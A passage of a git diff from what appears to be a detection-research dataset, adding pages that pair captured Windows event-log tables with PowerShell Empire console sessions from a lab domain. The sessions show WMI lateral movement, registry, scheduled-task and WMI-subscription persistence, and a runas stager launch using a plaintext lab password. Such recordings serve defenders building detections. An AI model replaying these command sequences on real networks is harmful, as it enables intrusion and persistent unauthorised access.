powershell/lateral_movement/invoke_wmi) > Invoke-Wmi executed on "HFDC01.shire.com" -[*] Sending POWERSHELL stager (stage 1) to 10.0.10.104 -[*] New agent DECFWPHY checked in -[+] Initial agent DECFWPHY from 10.0.10.104 now active (Slack) -[*] Sending agent (stage 2) to DECFWPHY at 10.0.10.104 - -(Empire: powershell/lateral_movement/invoke_wmi) > agents - -[*] Active agents: - - Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener - ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- - 2MES3XN6 ps 172.18.39.105 IT001 SHIRE\pgustavo powershell 4312 5/0.0 2019-03-19 14:22:50 https - G6BYHU4F ps 172.18.39.105 IT001 *SHIRE\pgustavo powershell 9156 5/0.0 2019-03-19 14:22:51 https - MPB3UHD1 ps 172.18.39.105 IT001 *SHIRE\pgustavo cmd 8148 5/0.0 2019-03-19 14:22:51 https - - DECFWPHY ps 172.18.39.5 HFDC01 *SHIRE\Mmidge powershell 904 5/0.0 2019-03-19 14:22:48 https - -(Empire: agents) > -``` \ No newline at end of file diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/README.md b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/README.md index 1c5c09fe..83b45c09 100644 --- a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/README.md +++ b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/README.md @@ -4,7 +4,7 @@ An adversary can use registry keys to persist in the environment ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_userland_registry](./empire_userland_registry.md) | 2019-03-19023812 | -| empire | shire | [empire_userland_schtasks](./empire_userland_schtasks.md) | 2019-03-19024742 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_userland_registry](./empire_userland_registry.md) | 2019-03-19023812 | +| shire | [empire_elevated_registry](./empire_elevated_registry.md) | 2019-05-18183936 | \ No newline at end of file diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.md b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.md new file mode 100644 index 00000000..bf04fce1 --- /dev/null +++ b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.md @@ -0,0 +1,117 @@ +# Empire Elevated Registry + +Persist a stager (or script) via the HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. + +## Technique(s) ID + +T1060 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_elevated_registry.tar.gz](./empire_elevated_registry.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18183936 + +## About this file + +| log_name | source_name | task | record_number | +|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 205 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 106 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 72 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 63 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 37 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 16 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 3 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 3 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 3 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 2 | +| Security | Microsoft-Windows-Security-Auditing | File System | 2 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 2 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 245 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 132 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 59 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 40 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 25 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 16 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 172 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule persistence/elevated/registry* +(Empire: powershell/persistence/elevated/registry) > info + + Name: Invoke-Registry + Module: powershell/persistence/elevated/registry + NeedsAdmin: True + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @mattifestation + @harmj0y + +Description: + Persist a stager (or script) via the + HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry + key. This has an easy detection/removal rating. + +Comments: + https://github.com/mattifestation/PowerSploit/blob/master/Pe + rsistence/Persistence.psm1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener False Listener to use. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + KeyName True Updater Key name for the run trigger. + RegPath False HKLM:SOFTWARE\Microsoft\ Registry location to store the script + Windows\CurrentVersion\D code. Last element is the key name. + ebug + Proxy False default Proxy to use for request (default, none, + or other). + ExtFile False Use an external file for the payload + instead of a stager. + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Cleanup False Switch. Cleanup the trigger and any + script from specified location. + ADSPath False Alternate-data-stream location to store + the script code. + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/persistence/elevated/registry) > set Listener https +(Empire: powershell/persistence/elevated/registry) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 1 +[*] Tasked agent TKV35P8X to run module powershell/persistence/elevated/registry +(Empire: powershell/persistence/elevated/registry) > Registry persistence established using listener https stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug. + +(Empire: powershell/persistence/elevated/registry) > +(Empire: powershell/persistence/elevated/registry) > +``` \ No newline at end of file diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.tar.gz b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.tar.gz new file mode 100644 index 00000000..d81f1425 Binary files /dev/null and b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.tar.gz differ diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_registry.md b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_registry.md index d25f5caf..10585c14 100644 --- a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_registry.md +++ b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_registry.md @@ -1,4 +1,3 @@ - # Empire Userland Registry An adversary can use powershell to set a value in HKCU:Software\Microsoft\Windows\CurrentVersion\Run to execute the script in whatever storage mechanism is selected. This will cause the script to run when only this user logs in. @@ -69,7 +68,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 86 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 523 | -## Empire Activity +## Attacker Activity ``` usemodule persistence/userland/registry diff --git a/small_datasets/windows/persistence/scheduled_task_T1053/README.md b/small_datasets/windows/persistence/scheduled_task_T1053/README.md new file mode 100644 index 00000000..0ee65371 --- /dev/null +++ b/small_datasets/windows/persistence/scheduled_task_T1053/README.md @@ -0,0 +1,10 @@ +# Persistence via Scheduled Tasks + +Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_userland_schtasks](./empire_userland_schtasks.md) | 2019-03-19024742 | +| shire | [empire_elevated_schtasks](./empire_userland_schtasks.md) | 2019-05-18184109 | \ No newline at end of file diff --git a/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.md b/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.md new file mode 100644 index 00000000..b8745bda --- /dev/null +++ b/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.md @@ -0,0 +1,122 @@ +# Empire Elevated Scheduled Tasks + +An adversary can create scheduled tasks to maintain persistence in the environment. + +## Technique(s) ID + +T1053 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_elevated_schtasks.tar.gz](./empire_elevated_schtasks.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18184109 + +## About this file + +| log_name | source_name | task | record_number | +|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 253 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 99 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 57 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 20 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 5 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 328 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 91 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 58 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 211 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule persistence/elevated/schtasks* +(Empire: powershell/persistence/elevated/schtasks) > info + + Name: Invoke-Schtasks + Module: powershell/persistence/elevated/schtasks + NeedsAdmin: True + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @mattifestation + @harmj0y + +Description: + Persist a stager (or script) using schtasks running as + SYSTEM. This has a moderate detection/removal rating. + +Comments: + https://github.com/mattifestation/PowerSploit/blob/master/Pe + rsistence/Persistence.psm1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + DailyTime False 09:00 Daily time to trigger the script + (HH:mm). + OnLogon False Switch. Trigger script on user logon. + ExtFile False Use an external file for the payload + instead of a stager. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + Cleanup False Switch. Cleanup the trigger and any + script from specified location. + TaskName True Updater Name to use for the schtask. + IdleTime False User idle time (in minutes) to trigger + script. + ADSPath False Alternate-data-stream location to store + the script code. + Agent True TKV35P8X Agent to run module on. + Listener False Listener to use. + RegPath False HKLM:\Software\Microsoft Registry location to store the script + \Network\debug code. Last element is the key name. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + +(Empire: powershell/persistence/elevated/schtasks) > set Listener https +(Empire: powershell/persistence/elevated/schtasks) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 2 +[*] Tasked agent TKV35P8X to run module powershell/persistence/elevated/schtasks +(Empire: powershell/persistence/elevated/schtasks) > SUCCESS: The scheduled task "Updater" has successfully been created. +Schtasks persistence established using listener https stored in HKLM:\Software\Microsoft\Network\debug with Updater daily trigger at 09:00. + +(Empire: powershell/persistence/elevated/schtasks) > +(Empire: powershell/persistence/elevated/schtasks) > +``` \ No newline at end of file diff --git a/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.tar.gz b/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.tar.gz new file mode 100644 index 00000000..1ed4f18e Binary files /dev/null and b/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.tar.gz differ diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.md b/small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.md similarity index 97% rename from small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.md rename to small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.md index ce047deb..8d2b2977 100644 --- a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.md +++ b/small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.md @@ -1,11 +1,10 @@ +# Empire Userland Scheduled Tasks -# Empire Userland Schedule Tasks - -An adversary can create a registry key and scheduled task to maintain persistence in the environment. +An adversary can create scheduled tasks to maintain persistence in the environment. ## Technique(s) ID -T1060 +T1053 ## Creators @@ -51,7 +50,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 116 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 192 | -## Empire Activity +## Attacker Activity ``` usemodule persistence/userland/schtasks diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.tar.gz b/small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.tar.gz similarity index 100% rename from small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.tar.gz rename to small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.tar.gz diff --git a/small_datasets/windows/persistence/wmi_event_subscription_T1084/README.md b/small_datasets/windows/persistence/wmi_event_subscription_T1084/README.md new file mode 100644 index 00000000..5ed25ba7 --- /dev/null +++ b/small_datasets/windows/persistence/wmi_event_subscription_T1084/README.md @@ -0,0 +1,9 @@ +# Persistence via WMI Subscriptions + +Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_elevated_wmi](./empire_elevated_wmi.md) | 2019-05-18184306 | \ No newline at end of file diff --git a/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.md b/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.md new file mode 100644 index 00000000..d454cdc2 --- /dev/null +++ b/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.md @@ -0,0 +1,120 @@ +# Empire Elevated WMI Subscription + +Persist a stager (or script) using a permanent WMI subscription. + +## Technique(s) ID + +T1084 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_elevated_wmi.tar.gz](./empire_elevated_wmi.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18184306 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|-------------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 259 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 198 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 114 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 24 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 20 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 16 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 14 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 14 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 13 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 8 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 47 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1678 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 192 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 100 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 92 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 8 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | WmiEventConsumer activity detected (rule: WmiEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | WmiEventConsumerToFilter activity detected (rule: WmiEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | WmiEventFilter activity detected (rule: WmiEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 218 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule persistence/elevated/wmi* +(Empire: powershell/persistence/elevated/wmi) > info + + Name: Invoke-WMI + Module: powershell/persistence/elevated/wmi + NeedsAdmin: True + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @mattifestation + @harmj0y + +Description: + Persist a stager (or script) using a permanent WMI + subscription. This has a difficult detection/removal rating. + +Comments: + https://github.com/mattifestation/PowerSploit/blob/master/Pe + rsistence/Persistence.psm1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + DailyTime False Daily time to trigger the script + (HH:mm). + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + ExtFile False Use an external file for the payload + instead of a stager. + Cleanup False Switch. Cleanup the trigger and any + script from specified location. + Agent True TKV35P8X Agent to run module on. + Listener True Listener to use. + SubName True Updater Name to use for the event subscription. + Proxy False default Proxy to use for request (default, none, + or other). + AtStartup False True Switch. Trigger script (within 5 + minutes) of system startup. + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + FailedLogon False Trigger script with a failed logon + attempt from a specified user + +(Empire: powershell/persistence/elevated/wmi) > set Listener https +(Empire: powershell/persistence/elevated/wmi) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 3 +[*] Tasked agent TKV35P8X to run module powershell/persistence/elevated/wmi +(Empire: powershell/persistence/elevated/wmi) > WMI persistence established using listener https with OnStartup WMI subsubscription trigger. + +(Empire: powershell/persistence/elevated/wmi) > +``` \ No newline at end of file diff --git a/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.tar.gz b/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.tar.gz new file mode 100644 index 00000000..b69dcf14 Binary files /dev/null and b/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.tar.gz differ diff --git a/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/README.md b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/README.md new file mode 100644 index 00000000..a7806e91 --- /dev/null +++ b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/README.md @@ -0,0 +1,9 @@ +# Access Token Manipulation + +Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_runas](./empire_invoke_runas.md) | 2019-05-18204300 | \ No newline at end of file diff --git a/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.md b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.md new file mode 100644 index 00000000..07ee890f --- /dev/null +++ b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.md @@ -0,0 +1,104 @@ +# Empire Invoke Runas + +Adversaries can execute a stager with explicit credentials runas style. + +## Technique(s) ID + +T1134 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_runas.tar.gz](./empire_invoke_runas.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18204300 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 376 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 14 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 145 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 131 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 23 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 14 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 11 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 9 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 8 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Authentication Service | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 42 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 466 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 419 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 363 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 135 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 325 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > scriptimport /tmp/invoke-runas-cmd.ps1 +[*] Tasked TKV35P8X to run TASK_SCRIPT_IMPORT +[*] Agent TKV35P8X tasked with task ID 22 +script successfully saved in memory + +(Empire: TKV35P8X) > scriptcmd Invoke-RunAs -username pgustavo -password "W1n1!19" -domain shire -Cmd cmd.exe -Arguments "/c C:\windows\system32\autoupdate.vbs" + +[*] Tasked TKV35P8X to run TASK_SCRIPT_COMMAND +[*] Agent TKV35P8X tasked with task ID 23 +(Empire: TKV35P8X) > Job started: G16X7P + +Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName +------- ------ ----- ----- ------ -- -- ----------- + 18 4 1528 1200 0.00 6732 1 cmd + + +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent V6W3TH8Y checked in +[+] Initial agent V6W3TH8Y from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to V6W3TH8Y at 10.0.10.103 + +(Empire: TKV35P8X) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 20:43:55 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 20:43:51 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 20:43:54 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 20:43:52 https + +(Empire: agents) > +``` \ No newline at end of file diff --git a/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.tar.gz b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.tar.gz new file mode 100644 index 00000000..c9486876 Binary files /dev/null and b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.tar.gz differ diff --git a/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/README.md b/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/README.md new file mode 100644 index 00000000..da381dad --- /dev/null +++ b/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/README.md @@ -0,0 +1,9 @@ +# Bypass User Account Control + +Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_ask](./empire_ask.md) | 2019-05-18183600 | \ No newline at end of file diff --git 